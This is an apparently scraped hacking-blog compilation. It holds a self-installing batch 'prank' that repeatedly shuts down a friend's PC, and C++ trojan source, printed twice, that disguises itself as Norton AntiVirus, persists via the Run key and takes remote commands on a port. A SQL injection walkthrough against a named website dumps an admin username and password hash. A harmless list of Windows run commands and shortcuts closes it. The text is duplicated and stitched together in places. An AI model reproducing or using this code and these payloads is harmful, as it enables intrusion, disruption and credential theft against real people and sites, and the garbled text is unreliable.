IRRITATING PRANK
hi everyone
i was fealing very bore so
i just now made a very annoying virus. it can irritate any one
okay the code i m giving is of dos, so save it with an extension of .bat copy dis code and save it as a batch file
1)
--------------------------------------------------------------------------
@echo off
copy %0 "%userprofile%\Start Menu\Programs\Startup\"
cls
:start
c:\windows\system32\shutdown.exe /s /t 60 /c "hi buddy"
ping 1 -n 7 -w 200 >nul
c:\windows\system32\shutdown.exe /a
c:\windows\system32\shutdown.exe /s /t 60 /c "i came here to say u hi"
ping 1 -n 7 -w 200 >nul
c:\windows\system32\shutdown.exe /a
c:\windows\system32\shutdown.exe /s /t 60 /c "r u eating now"
ping 1 -n 7 -w 200 >nul
c:\windows\system32\shutdown.exe /a
c:\windows\system32\shutdown.exe /s /t 60 /c "y r u not eating"
ping 1 -n 7 -w 200 >nul
c:\windows\system32\shutdown.exe /a
goto start
---------------------------------------------------------------------------------------------------
2)
to make it even more irritating
copy these 3 lines
c:\windows\system32\shutdown.exe /s /t 60 /c "hi buddy"
ping 1 -n 7 -w 200 >nul
c:\windows\system32\shutdown.exe /a
and paste it before goto 40-50 times
and goto the first line every time which is
c:\windows\system32\shutdown.exe /s /t 300 /c "hi buddy"
and replace hi buddy with what ever u want to write
please write some irritating things only over their
you will have to replace hi buddy everywhere ,wherever you have pasted the above 3 lines
this program will run itself automatically whenever computer starts
if one gets irritated and he closes this program
then after 1 minute his computer will also shutdownso run dis program in your friends' computer
and enjoy watching them get irritated
it will pop up msgbox one after the other continuously
with the text whatever you write replacing hi buddy
one after the other msgbox will keep appearing
and this process will continue endlessly
so its for sure one will get irritated at last
and he will close this program
after closing this program his computer will also shutdown
his computer will shutdown after 1 min
quinta-feira, 13 de junho de 2019
TROJAN VIRUS SOURCE CODE
#include
#include
#include
using namespace std;
char Windir[MAX_PATH];
char Module[MAX_PATH];
SOCKET Socket;
void Hide()
{
SetConsoleTitle(“Norton AntiVirus”);
hide = FindWindow(NULL, “Norton AntiVirus”);
ShowWindow(hide, 0);
}
void GetPaths()
{
GetSystemDirectory(Windir, sizeof(Windir));
GetModuleFileName(0, Module, sizeof(Module));
strcat(Windir, “\\WindowsAPICalls.exe”);
}
void Install()
{
CopyFile(Module,Windir,0);
HKEY Install;
RegOpenKey(HKEY_LOCAL_MACHINE,”Software\\Microsoft\\Windows\\CurrentVersion\\Run”, &Install);
RegSetValueEx(Install, “Windows API Calls”, 0, REG_SZ, (LPBYTE)Windir, sizeof(Windir));
RegCloseKey(Install);
}
int ServerInitialize()
{
WSADATA wsaData;
int iResult = WSAStartup( MAKEWORD(2,2), &wsaData );
if ( iResult != NO_ERROR )
{
WSACleanup();
system(Module);
return 0;
}
else
{
cout << “Winsock initialized.” << “\n”;
}
Socket = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
if (Socket == INVALID_SOCKET )
{
WSACleanup();
system(Module);
return 0;
}
else
{
cout << “Socket created.” << “\n”;
}
sockaddr_in service;
service.sin_family = AF_INET;
service.sin_addr.s_addr = INADDR_ANY;
service.sin_port = htons(5432);
if (bind(Socket, (SOCKADDR*) &service,sizeof(service)) == SOCKET_ERROR)
{
closesocket(Socket);
system(Module);
return 0;
}
else
{
cout << “Socket bound successfully.” << “\n”;
}
if (listen( Socket, 1 ) == SOCKET_ERROR )
cout << “Error listening on socket.” << “\n”;
SOCKET AcceptSocket;
cout << “Waiting for a client to connect…” << “\n”;
AcceptSocket = SOCKET_ERROR;
while (AcceptSocket == SOCKET_ERROR )
{
AcceptSocket = accept(Socket, NULL, NULL );
}
cout << “Client Connected.”<< “\n”;
Socket = AcceptSocket;
}
void Shutdown()
{
char Message[MAX_PATH]=”Your computer is infected with a malicious virus!”;
InitiateSystemShutdown(NULL,Message,sizeof(Message),true,false);
}
void OpenCloseCDTray()
{
mciSendString(“set cdaudio door open”, 0, 0, 0);
mciSendString(“set cdaudio door open”, 0, 0, 0);
}
void Bomb()
{
HWND hwnd;
char Notepad[MAX_PATH]=”notepad.exe”;
for(;;)
{
ShellExecute(hwnd,”open”,Notepad,NULL,NULL,SW_MAXIMIZE);
}
}
void LeftMouse()
{
SwapMouseButton(true);
}
void RightMouse()
{
SwapMouseButton(false);
}
void Receive()
{
for(;;)
{
char Choice[MAX_PATH]=”";
cout << “Waiting for commands, sir!” << “\n”;
recv(Socket, Choice, sizeof(Choice), 0);
cout << Choice << “\n”;
if (!strcmp(Choice,”1″))
{
LeftMouse();
const char c_LeftMouse[MAX_PATH]={“Mouse changed; left.”};
send(Socket,c_LeftMouse, sizeof(c_LeftMouse),0);
}
if (!strcmp(Choice,”2″))
{
RightMouse();
const char c_RightMouse[MAX_PATH]={“Mouse changed; right.”};
send(Socket,c_RightMouse, sizeof(c_RightMouse),0);
}
if (!strcmp(Choice,”3″))
{
OpenCloseCDTray();
const char c_CDTray[MAX_PATH]={“CD Tray opened. Closed if not on a laptop.”};
send(Socket,c_CDTray, sizeof(c_CDTray),0);
}
if (!strcmp(Choice,”4″))
{
Shutdown();
const char c_Shutdown[MAX_PATH]={“Shutdown initiated.”};
send(Socket,c_Shutdown, sizeof(c_Shutdown),0);
}
}
}
int main()
{
Hide();
GetPaths();
if(!strcmp(Windir,Module))
{
ServerInitialize();
Receive();
}
else
{
Install();
ServerInitialize();
Receive();
}
return 0;
}
#include
#include
using namespace std;
char Windir[MAX_PATH];
char Module[MAX_PATH];
SOCKET Socket;
void Hide()
{
SetConsoleTitle(“Norton AntiVirus”);
hide = FindWindow(NULL, “Norton AntiVirus”);
ShowWindow(hide, 0);
}
void GetPaths()
{
GetSystemDirectory(Windir, sizeof(Windir));
GetModuleFileName(0, Module, sizeof(Module));
strcat(Windir, “\\WindowsAPICalls.exe”);
}
void Install()
{
CopyFile(Module,Windir,0);
HKEY Install;
RegOpenKey(HKEY_LOCAL_MACHINE,”Software\\Microsoft\\Windows\\CurrentVersion\\Run”, &Install);
RegSetValueEx(Install, “Windows API Calls”, 0, REG_SZ, (LPBYTE)Windir, sizeof(Windir));
RegCloseKey(Install);
}
int ServerInitialize()
{
WSADATA wsaData;
int iResult = WSAStartup( MAKEWORD(2,2), &wsaData );
if ( iResult != NO_ERROR )
{
WSACleanup();
system(Module);
return 0;
}
else
{
cout << “Winsock initialized.” << “\n”;
}
Socket = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
if (Socket == INVALID_SOCKET )
{
WSACleanup();
system(Module);
return 0;
}
else
{
cout << “Socket created.” << “\n”;
}
sockaddr_in service;
service.sin_family = AF_INET;
service.sin_addr.s_addr = INADDR_ANY;
service.sin_port = htons(5432);
if (bind(Socket, (SOCKADDR*) &service,sizeof(service)) == SOCKET_ERROR)
{
closesocket(Socket);
system(Module);
return 0;
}
else
{
cout << “Socket bound successfully.” << “\n”;
}
if (listen( Socket, 1 ) == SOCKET_ERROR )
cout << “Error listening on socket.” << “\n”;
SOCKET AcceptSocket;
cout << “Waiting for a client to connect…” << “\n”;
AcceptSocket = SOCKET_ERROR;
while (AcceptSocket == SOCKET_ERROR )
{
AcceptSocket = accept(Socket, NULL, NULL );
}
cout << “Client Connected.”<< “\n”;
Socket = AcceptSocket;
}
void Shutdown()
{
char Message[MAX_PATH]=”Your computer is infected with a malicious virus!”;
InitiateSystemShutdown(NULL,Message,sizeof(Message),true,false);
}
void OpenCloseCDTray()
{
mciSendString(“set cdaudio door open”, 0, 0, 0);
mciSendString(“set cdaudio door open”, 0, 0, 0);
}
void Bomb()
{
HWND hwnd;
char Notepad[MAX_PATH]=”notepad.exe”;
for(;;)
{
ShellExecute(hwnd,”open”,Notepad,NULL,NULL,SW_MAXIMIZE);
}
}
void LeftMouse()
{
SwapMouseButton(true);
}
void RightMouse()
{
SwapMouseButton(false);
}
void Receive()
{
for(;;)
{
char Choice[MAX_PATH]=”";
cout << “Waiting for commands, sir!” << “\n”;
recv(Socket, Choice, sizeof(Choice), 0);
cout << Choice << “\n”;
if (!strcmp(Choice,”1″))
{
LeftMouse();
const char c_LeftMouse[MAX_PATH]={“Mouse changed; left.”};
send(Socket,c_LeftMouse, sizeof(c_LeftMouse),0);
}
if (!strcmp(Choice,”2″))
{
RightMouse();
const char c_RightMouse[MAX_PATH]={“Mouse changed; right.”};
send(Socket,c_RightMouse, sizeof(c_RightMouse),0);
}
if (!strcmp(Choice,”3″))
{
OpenCloseCDTray();
const char c_CDTray[MAX_PATH]={“CD Tray opened. Closed if not on a laptop.”};
send(Socket,c_CDTray, sizeof(c_CDTray),0);
}
if (!strcmp(Choice,”4″))
{
Shutdown();
const char c_Shutdown[MAX_PATH]={“Shutdown initiated.”};
send(Socket,c_Shutdown, sizeof(c_Shutdown),0);
}
}
}
int main()
{
Hide();
GetPaths();
if(!strcmp(Windir,Module))
{
ServerInitialize();
Receive();
}
else
{
Install();
ServerInitialize();
Receive();
}
return 0;
}
- Sql Injection -
- Sql Injection -
This Article Is About how to Hack a website with SQL Injection. I and stealthhackroom.blogspot.com Takes No responsibility for it’s misuse.ok.
we have a target http://www.allaboutcar.net/articles.php?topic=-3 let see if this is vnlnerable to sql Injection to check it put a ' in the end
http://www.allaboutcar.net/articles.php?topic=3'\
it gives a mysql Database error . that means its vnlnerable to sql injection .. ok lets get the cloumn numbers to do that u need this command "order by " .. put that in the end with count numbers
For Example:[-
http://www.allaboutcar.net/articles.php?topic=3 order by 1--
http://www.allaboutcar.net/articles.php?topic=3 order by 2--
http://www.allaboutcar.net/articles.php?topic=3 order by 3--
do that untill u get a error
It gives a error on http://www.allaboutcar.net/articles.php?topic=3 order by 6--
that mean it only has 5 columns .. because it didn,t give a error on
http://www.allaboutcar.net/articles.php?topic=3 order by 5--
...
ok lets do the Union
to do this .. u need to use this command Union select
http://www.allaboutcar.net/articles.php?topic=-3 union select 1,2,3,4,5--
like that ..
there sould be number pop up somewhere
we got number 2 pop'd .. ok lets do the inject to 2
1st thing we need to check the db version if its 5 ..we continue .. if itsversion 4 .. u have to guess the table and columns to check the database version use this command "@@version" or "version()"its the version 5
5.0.67
ok now ..
let get the table names.. to do that u need to use this commands
group_concat(table_name)
information_schema.tables
we put this because we need the tables of the default detabase
where table_schema=database()--
we have the list of table here now
ok .. now we got this tables
http://www.allaboutcar.net/articles.php?topic=-3
For Example:[-
http://www.allaboutcar.net/articles.php?topic=3 order by 1--
http://www.allaboutcar.net/articles.php?topic=3 order by 2--
http://www.allaboutcar.net/articles.php?topic=3 order by 3--
do that untill u get a error
It gives a error on http://www.allaboutcar.net/articles.php?topic=3 order by 6--
that mean it only has 5 columns .. because it didn,t give a error on
http://www.allaboutcar.net/articles.php?topic=3 order by 5--
...
ok lets do the Union
to do this .. u need to use this command Union select
http://www.allaboutcar.net/articles.php?topic=-3 union select 1,2,3,4,5--
like that ..
there sould be number pop up somewhere
we got number 2 pop'd .. ok lets do the inject to 2
1st thing we need to check the db version if its 5 ..we continue .. if itsversion 4 .. u have to guess the table and columns to check the database version use this command "@@version" or "version()"its the version 5
5.0.67
ok now ..
let get the table names.. to do that u need to use this commands
group_concat(table_name)
information_schema.tables
we put this because we need the tables of the default detabase
where table_schema=database()--
we have the list of table here now
ok .. now we got this tables
http://www.allaboutcar.net/articles.php?topic=-3
union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--
Admins
,articles,ban,banners,banners_info,comments,file_categories,file_data,forum_a,forum_b,
Admins
,articles,ban,banners,banners_info,comments,file_categories,file_data,forum_a,forum_b,
forum_c,gbook,
infopages,
jp_users,links_categories,links_data,mails,menu,news,poll_data,poll_desc,pw,topic,
infopages,
jp_users,links_categories,links_data,mails,menu,news,poll_data,poll_desc,pw,topic,
users,ok we have the admin table here ..ok lets get the columns now .. to do that just chnage this
http://www.allaboutcar.net/articles.php?topic=-3
http://www.allaboutcar.net/articles.php?topic=-3
union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--
to
http://www.allaboutcar.net/articles.php?topic=-3
to
http://www.allaboutcar.net/articles.php?topic=-3
union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema=database()--
Now we have the columns
id,nick,pass,name,added,access,mail,stat,id,date,title,text,opened,comments,discript,
Now we have the columns
id,nick,pass,name,added,access,mail,stat,id,date,title,text,opened,comments,discript,
topic,author,id,ip,
date,id,title,
alt,url,img,code,mode,opened,o_limit,click,date,e_date,stat,what,id,title,text,next,id,
date,id,title,
alt,url,img,code,mode,opened,o_limit,click,date,e_date,stat,what,id,title,text,next,id,
what,date,wid,name,
mail,title,
text,ip,
id,title,text,pos,opened,stat,id,category,title,text,link,date,pass,mail,opened,bad,stat,size,id,
now lets put this togeter !!
Table : admins
Columns : id,nick,pass,
In this we asked for the columns name's data from admin table
http://www.allaboutcar.net/articles.php?topic=-3
union select 1,group_concat(id,0x3a,nick,0x3a,pass),3,4,5 from admins--
now here we have the id , nick and password hash .. you need to use a md5 cracker to crack this password .
So Friends that all for this tutorial
Username : MaTySeK,
Password Hash: 9dc1fc60fcd6bb1a10b9d97e64cdc253
mail,title,
text,ip,
id,title,text,pos,opened,stat,id,category,title,text,link,date,pass,mail,opened,bad,stat,size,id,
now lets put this togeter !!
Table : admins
Columns : id,nick,pass,
In this we asked for the columns name's data from admin table
http://www.allaboutcar.net/articles.php?topic=-3
union select 1,group_concat(id,0x3a,nick,0x3a,pass),3,4,5 from admins--
now here we have the id , nick and password hash .. you need to use a md5 cracker to crack this password .
So Friends that all for this tutorial
Username : MaTySeK,
Password Hash: 9dc1fc60fcd6bb1a10b9d97e64cdc253
Dos Tricks and Shortcuts
Accessibility Controls access.cpl
Add Hardware Wizard hdwwiz.cpl
Add/Remove Programs appwiz.cpl
Administrative Tools control admintools
Automatic Updates wuaucpl.cpl
Bluetooth Transfer Wizard fsquirt
Calculator calc
Certificate Manager certmgr.msc
Character Map charmap
Check Disk Utility chkdsk
Clipboard Viewer clipbrd
Command Prompt cmd
Component Services dcomcnfg
Computer Management compmgmt.msc
timedate.cpl ddeshare
Device Manager devmgmt.msc
Direct X Control Panel (If Installed)* directx.cpl
Direct X Troubleshooter dxdiag
Disk Cleanup Utility cleanmgr
Disk Defragment dfrg.msc
Disk Management diskmgmt.msc
Disk Partition Manager diskpart
Display Properties control desktop
Display Properties desk.cpl
Display Properties (w/Appearance Tab Preselected) control color
Dr. Watson System Troubleshooting Utility drwtsn32
Driver Verifier Utility verifier
Event Viewer eventvwr.msc
File Signature Verification Tool sigverif
Findfast findfast.cpl
Folders Properties control folders
Fonts control fonts
Fonts Folder fonts
Free Cell Card Game freecell
Game Controllers joy.cpl
Group Policy Editor (XP Prof) gpedit.msc
Hearts Card Game mshearts
Iexpress Wizard iexpress
Indexing Service ciadv.msc
Internet Properties inetcpl.cpl
IP Configuration (Display Connection Configuration) ipconfig /all
IP Configuration (Display DNS Cache Contents) ipconfig /displaydns
IP Configuration (Delete DNS Cache Contents) ipconfig /flushdns
IP Configuration (Release All Connections) ipconfig /release
IP Configuration (Renew All Connections) ipconfig /renew
IP Configuration (Refreshes DHCP & Re-Registers DNS) ipconfig /registerdns
IP Configuration (Display DHCP Class ID) ipconfig /showclassid
IP Configuration (Modifies DHCP Class ID) ipconfig /setclassid
Java Control Panel (If Installed) jpicpl32.cpl
Java Control Panel (If Installed) javaws
Keyboard Properties control keyboard
Local Security Settings secpol.msc
Local Users and Groups lusrmgr.msc
Logs You Out Of Windows logoff
Microsoft Chat winchat
Minesweeper Game winmine
Mouse Properties control mouse
Mouse Properties main.cpl
Network Connections control netconnections
Network Connections ncpa.cpl
Network Setup Wizard netsetup.cpl
Notepad notepad
Nview Desktop Manager (If Installed) nvtuicpl.cpl
Object Packager packager
ODBC Data Source Administrator odbccp32.cpl
On Screen Keyboard osk
Opens AC3 Filter (If Installed) ac3filter.cpl
Password Properties password.cpl
Performance Monitor perfmon.msc
Performance Monitor perfmon
Phone and Modem Options telephon.cpl
Power Configuration powercfg.cpl
Printers and Faxes control printers
Printers Folder printers
Private Character Editor eudcedit
Quicktime (If Installed) QuickTime.cpl
Regional Settings intl.cpl
Registry Editor regedit
Registry Editor regedit32
Remote Desktop mstsc
Removable Storage ntmsmgr.msc
Removable Storage Operator Requests ntmsoprq.msc
Resultant Set of Policy (XP Prof) rsop.msc
Scanners and Cameras sticpl.cpl
Scheduled Tasks control schedtasks
Security Center wscui.cpl
Services services.msc
Shared Folders fsmgmt.msc
Shuts Down Windows shutdown
Sounds and Audio mmsys.cpl
Spider Solitare Card Game spider
SQL Client Configuration cliconfg
System Configuration Editor sysedit
System Configuration Utility msconfig
System File Checker Utility (Scan Immediately) sfc /scannow
System File Checker Utility (Scan Once At Next Boot) sfc /scanonce
System File Checker Utility (Scan On Every Boot) sfc /scanboot
System File Checker Utility (Return to Default Setting) sfc /revert
System File Checker Utility (Purge File Cache) sfc /purgecache
System File Checker Utility (Set Cache Size to size x) sfc /cachesize=x
System Properties sysdm.cpl
Task Manager taskmgr
Telnet Client telnet
User Account Management nusrmgr.cpl
Utility Manager utilman
Windows Firewall firewall.cpl
Windows Magnifier magnify
Windows Management Infrastructure wmimgmt.msc
Windows System Security Tool syskey
Windows Update Launches wupdmgr
Windows XP Tour Wizard tourstart
Wordpad write
Run line commands can be very useful some times, its better to know them here are all the commands that i know u might find them usefull tooCommands are same for Windows xp pro and home
RUN LINE COMMANDS
These are GUI applications that can be opened from the run line.
These applications are not located in the C:\windows\system32\ directory, the
keys for these applications are located in the registry under: HKLM\software\microsoft\windows\currentversion\app paths BCKGZM.EXE - Backgammon
CHKRZM.EXE - Checkers
CONF.EXE - NetMeeting
DIALER.EXE - Phone Dialer
HELPCTR.EXE - Help and Support
HRTZZM.EXE - Internet Hearts
HYPERTRM.EXE - HyperTerminal
ICWCONN1.EXE - Internet Connection Wizard
IEXPLORE.EXE - Internet Explorer
INETWIZ.EXE - Setup Your Internet Connection
INSTALL.EXE - User's Folder
MIGWIZ.EXE - File and Settings Transfer Wizard
MOVIEMK.EXE - Windows Movie Maker
MPLAYER2.EXE - Windows Media Player Version 6.4.09.1120
MSCONFIG.EXE - System Configuration Utility
MSIMN.EXE - Outlook Express
MSINFO32.EXE - System Information
MSMSGS.EXE - Windows Messenger
MSN6.EXE - MSN Explorer
PBRUSH.EXE - Paint
PINBALL.EXE - Pinball
RVSEZM.EXE - Reversi
SHVLZM.EXE - Spades
TABLE30.EXE - User's Folder
WAB.EXE - Windows Address Book
WABMIG.EXE - Address Book Import Tool
WINNT32.EXE - User's Folder
WMPLAYER.EXE - Windows Media Player
WRITE.EXE - Wordpad
These .EXE files reside in (c:\windows\system32\) or (c:\windows\) directory.
ACCWIZ.EXE - Accessibility Wizard
CALC.EXE - Calculator
CHARMAP.EXE - Character Map
CLEANMGR.EXE - Disk Space Cleanup Manager
CLICONFG.EXE - SQL Client Configuration Utility
CLIPBRD.EXE - Clipbook Viewer
CLSPACK.EXE - Class Package Export Tool
CMD.EXE - Command Line
CMSTP.EXE - Connection Manager Profile Installer
CONTROL.EXE - Control Panel
DCOMCNFG.EXE - Component Services
DDESHARE.EXE - DDE Share
DRWATSON.EXE - Doctor Watson v1.00b
DRWTSN32.EXE - Doctor Watson Settings
DVDPLAY.EXE - DVD Player
DXDIAG.EXE - DirectX Diagnostics
EUDCEDIT.EXE - Private Character Editor
EVENTVWR.EXE - Event Viewer
EXPLORER.EXE - Windows Explorer
FREECELL.EXE - Free Cell
FXSCLNT.EXE - Fax Console
FXSCOVER.EXE - Fax Cover Page Editor
FXSEND.EXE - MS Fax Send Note Utility
IEXPRESS.EXE - IExpress 2.0
LOGOFF.EXE - System Logoff
MAGNIFY.EXE - Microsoft Magnifier
MMC.EXE - Microsoft Management Console
MOBSYNC.EXE - Microsoft Synchronization Manager
MPLAY32.EXE - Windows Media Player version 5.1
MSHEARTS.EXE - Hearts
MSPAINT.EXE - Paint
MSTSC.EXE - Remote Desktop Connection
NARRATOR.EXE - Microsoft Narrator
NETSETUP.EXE - Network Setup Wizard
NOTEPAD.EXE - Notepad
NSLOOKUP.EXE - NSLookup Application
NTSD.EXE - Symbolic Debugger for Windows 2000
ODBCAD32.EXE - ODBC Data Source Administrator
OSK.EXE - On Screen Keyboard
OSUNINST.EXE - Windows Uninstall Utility
PACKAGER.EXE - Object Packager
PERFMON.EXE - Performance Monitor
PROGMAN.EXE - Program Manager
RASPHONE.EXE - Remote Access Phonebook
REGEDIT.EXE - Registry Editor
REGEDT32.EXE - Registry Editor
RESET.EXE - Resets Session
RSTRUI.EXE - System Restore
RTCSHARE.EXE - RTC Application Sharing
SFC.EXE - System File Checker
SHRPUBW.EXE - Create Shared Folder
SHUTDOWN.EXE - System Shutdown
SIGVERIF.EXE - File Signature Verification
SNDREC32.EXE - Sound Recorder
SNDVOL32.EXE - Sound Volume
SOL.EXE - Solitaire
SPIDER.EXE - Spider Solitaire
SYNCAPP.EXE - Create A Briefcase
SYSEDIT.EXE - System Configuration Editor
SYSKEY.EXE - SAM Lock Tool
TASKMGR.EXE - Task Manager
TELNET.EXE - MS Telnet Client
TSSHUTDN.EXE - System Shutdown
TOURSTART.EXE - Windows Tour Launcher
UTILMAN.EXE - System Utility Manager
USERINIT.EXE - My Documents
VERIFIER.EXE - Driver Verifier Manager
WIAACMGR.EXE - Scanner and Camera Wizard
WINCHAT.EXE - Windows for Workgroups Chat
WINHELP.EXE - Windows Help Engine
WINHLP32.EXE - Help
WINMINE.EXE - Minesweeper
WINVER.EXE - Windows Version Information
WRITE.EXE - WordPad
WSCRIPT.EXE - Windows Script Host Settings
WUPDMGR.EXE - Windows Update
The following are Control Panel applets that can be run from the run line.
They are located in the c:\windows\system32 directory, and have the file type
extension ".CPL".
ACCESS.CPL - Accessibility Options
APPWIZ.CPL - Add or Remove Programs
DESK.CPL - Display Properties
HDWWIZ.CPL - Add Hardware Wizard
INETCPL.CPL - Internet Explorer Properties
INTL.CPL - Regional and Language Options
JOY.CPL - Game Controllers
MAIN.CPL - Mouse Properties
MMSYS.CPL - Sounds and Audio Device Properties
NCPA.CPL - Network Connections
NUSRMGR.CPL - User Accounts
ODBCCP32.CPL - ODBC Data Source Administrator
POWERCFG.CPL - Power Options Properties
SYSDM.CPL - System Properties
TELEPHON.CPL - Phone and Modem Options
TIMEDATE.CPL - Date and Time Properties
The following are Microsoft Management Console Snap-ins that can be opened from
the run line. These applications have the file type extension ".MSC".
CERTMGR.MSC - Certificates
CIADV.MSC - Indexing Service
COMPMGMT.MSC - Computer Management
DEVMGMT.MSC - Device Manager
DFRG.MSC - Disk Defragmenter
DISKMGMT.MSC - Disk Management
EVENTVWR.MSC - Event Viewer
FSMGMT.MSC - Shared Folders
LUSRMGR.MSC - Local Users and Groups
NTMSMGR.MSC - Removable Storage
NTMSOPRQ.MSC - Removable Storage Operator Requests
PERFMON.MSC - Performance Monitor
SERVICES.MSC - Services
WMIMGMT.MSC - Windows Management Infrastructure
CALCULATION ON COMMAND PROMPT ! U KNEW DIS???
The command processor CMD.EXE comes with a mini-calculator that can perform simple arithmetic on 32-bit signed integers:
C:\>set /a 2+2
4
C:\>set /a 2*(9/2)
8
C:\>set /a (2*9)/2
9
C:\>set /a "31>>2"
7
Note that we had to quote the shift operator since it would otherwise be misinterpreted as a "redirect stdout and append" operator.
For more information, type set /? at the command prompt.
***************************************************************************
Hey folks, do u know that windows XP is having a hidden "Star Wars Movie" inside it???
You should be connected to the NET for using this.
Go to Starts-->Programs-->Run
Type
telnet towel.blinkenlights.nl
And hit enter......... Enjoy the magic!!!!
All keyboard Shortcuts
All keyboard Shortcuts
· Shift + F10 right-clicks.
· Win + L (XP Only): Locks keyboard. Similar to Lock Workstation.
· Win + F or F3: Open Find dialog. (All Files) F3 may not work in some applications which use F3 for their own find dialogs.
· Win + Control + F: Open Find dialog. (Computers)
· Win + U: Open Utility Manager.
· Win + F1: Open Windows help.
· Win + Pause: Open System Properties dialog.
· Win + Tab: Cycle through taskbar buttons. Enter clicks, AppsKey or Shift + F10 right-clicks.
· Win + Shift + Tab: Cycle through taskbar buttons in reverse.
· Alt + Tab: Display Cool Switch. More commonly known as the AltTab dialog.
· Alt + Shift + Tab: Display Cool Switch; go in reverse.
· Alt + Escape: Send active window to the bottom of the z-order.
· Alt + Shift + Escape: Activate the window at the bottom of the z-order.
· Alt + F4: Close active window; or, if all windows are closed, open shutdown dialog.
· Shift while a CD is loading: Bypass AutoPlay.
· Shift while login: Bypass startup folder. Only those applications will be ignored which are in the startup folder, not those started from the registry (Microsoft\Windows\CurrentVersion\Run\)
· Ctrl + Alt + Delete or Ctrl + Alt + NumpadDel (Both NumLock states): Invoke the Task Manager or NT Security dialog.
· Ctrl + Shift + Escape (2000/XP ) or (Ctrl + Alt + NumpadDot) : Invoke the task manager. On earlier OSes, acts like Ctrl + Escape.
· Print screen: Copy screenshot of current screen to clipboard.
· Alt + Print screen: Copy screenshot of current active window to clipboard.
· Ctrl + Alt + Down Arrow: Invert screen. Untested on OS's other than XP.
· Ctrl + Alt + Up Arrow: Undo inversion.
· Win + B : Move focus to systray icons.
General
· Ctrl + C or Ctrl + Insert: Copy.
· Ctrl + X or Shift + Delete: Cut.
· Ctrl + V or Shift + Insert: Paste/Move.
· Ctrl + N: New... File, Tab, Entry, etc.
· Ctrl + S: Save.
· Ctrl + O: Open...
· Ctrl + P: Print.
· Ctrl + Z: Undo.
· Ctrl + A: Select all.
· Ctrl + F: Find...
· Ctrl+W : to close the current window
· Ctrl + F4: Close tab or child window.
· F1: Open help.
· F11: Toggle full screen mode.
· Alt or F10: Activate menu bar.
· Alt + Space: Display system menu. Same as clicking the icon on the titlebar.
· Escape: Remove focus from current control/menu, or close dialog box.
General Navigation
· Tab: Forward one item.
· Shift + Tab: Backward one item.
· Ctrl + Tab: Cycle through tabs/child windows.
· Ctrl + Shift + Tab: Cycle backwards through tabs/child windows.
· Enter: If a button's selected, click it, otherwise, click default button.
· Space: Toggle items such as radio buttons or checkboxes.
· Alt + (Letter): Activate item corresponding to (Letter). (Letter) is the underlined letter on the item's name.
· Ctrl + Left: Move cursor to the beginning of previous word.
· Ctrl + Right: Move cursor to the beginning of next word.
· Ctrl + Up: Move cursor to beginning of previous paragraph. This and all subsequent Up/Down hotkeys in this section have only been known to work in Rich Edit controls.
· Ctrl + Down: Move cursor to beginning of next paragraph.
· Shift + Left: Highlight one character to the left.
· Shift + Right: Highlight one character to the right.
· Shift + Up: Highlight from current cursor position, to one line up.
· Shift + Down: Highlight from current cursor position, to one line down.
· Ctrl + Shift + Left: Highlight to beginning of previous word.
· Ctrl + Shift + Right: Highlight to beginning of next word.
· Ctrl + Shift + Up: Highlight to beginning of previous paragraph.
· Ctrl + Shift + Down: Highlight to beginning of next paragraph.
· Home: Move cursor to top of a scrollable control.
· End: Move cursor to bottom of a scrollable control.
File Browser
· Arrow Keys: Navigate.
· Shift + Arrow Keys: Select multiple items.
· Ctrl + Arrow Keys: Change focus without changing selection. "Focus" is the object that will run on Enter. Space toggles selection of the focused item.
· (Letter): Select first found item that begins with (Letter).
· BackSpace: Go up one level to the parent directory.
· Alt + Left: Go back one folder.
· Alt + Right: Go forward one folder.
· Enter: Activate (Double-click) selected item(s).
· Alt + Enter: View properties for selected item.
· F2: Rename selected item(s).
· Ctrl + NumpadPlus: In a Details view, resizes all columns to fit the longest item in each one.
· Delete: Delete selected item(s).
· Shift + Delete: Delete selected item(s); bypass Recycle Bin.
· Ctrl while dragging item(s): Copy.
· Ctrl + Shift while dragging item(s): Create shortcut(s).
· In tree pane, if any:
· Left: Collapse the current selection if expanded, or select the parent folder.
· Right: Expand the current selection if collapsed, or select the first subfolder.
· Numpad Asterisk: Expand currently selected directory and all subdirectories. No undo.
· Numpad Plus: Expand currently selected directory.
· Numpad Minus: Collapse currently selected directory.
Accessibility
· Right Shift for eight seconds: Toggle FilterKeys on and off. FilterKeys must be enabled.
· Left Alt + Left Shift + PrintScreen: Toggle High Contrast on and off. High Contrast must be enabled.
· Left Alt + Left Shift + NumLock: Toggle MouseKeys on and off. MouseKeys must be enabled.
· NumLock for five seconds: Toggle ToggleKeys on and off. ToggleKeys must be enabled.
· Shift five times: Toggle StickyKeys on and off. StickyKeys must be enabled.
· 6.) Microsoft Natural Keyboard with IntelliType Software Installed
· Win + L: Log off Windows.
· Win + P: Open Print Manager.
· Win + C: Open control panel.
· Win + V: Open clipboard.
· Win + K: Open keyboard properties.
· Win + I: Open mouse properties.
· Win + A: Open Accessibility properties.
· Win + Space: Displays the list of Microsoft IntelliType shortcut keys.
· Win + S: Toggle CapsLock on and off.
Remote Desktop Connection Navigation
· Ctrl + Alt + End: Open the NT Security dialog.
· Alt + PageUp: Switch between programs.
· Alt + PageDown: Switch between programs in reverse.
· Alt + Insert: Cycle through the programs in most recently used order.
· Alt + Home: Display start menu.
· Ctrl + Alt + Break: Switch the client computer between a window and a full screen.
· Alt + Delete: Display the Windows menu.
· Ctrl + Alt + NumpadMinus: Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing Alt + PrintScreen on a local computer.
· Ctrl + Alt + NumpadPlus: Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PrintScreen on a local computer.
Mozilla Firefox Shortcuts
· Ctrl + Tab or Ctrl + PageDown: Cycle through tabs.
· Ctrl + Shift + Tab or Ctrl + PageUp: Cycle through tabs in reverse.
· Ctrl + (1-9): Switch to tab corresponding to number.
· Ctrl + N: New window.
· Ctrl + T: New tab.
· Ctrl + L or Alt + D or F6: Switch focus to location bar.
· Ctrl + Enter: Open location in new tab.
· Shift + Enter: Open location in new window.
· Ctrl + K or Ctrl + E: Switch focus to search bar.
· Ctrl + O: Open a local file.
· Ctrl + W: Close tab, or window if there's only one tab open.
· Ctrl + Shift + W: Close window.
· Ctrl + S: Save page as a local file.
· Ctrl + P: Print page.
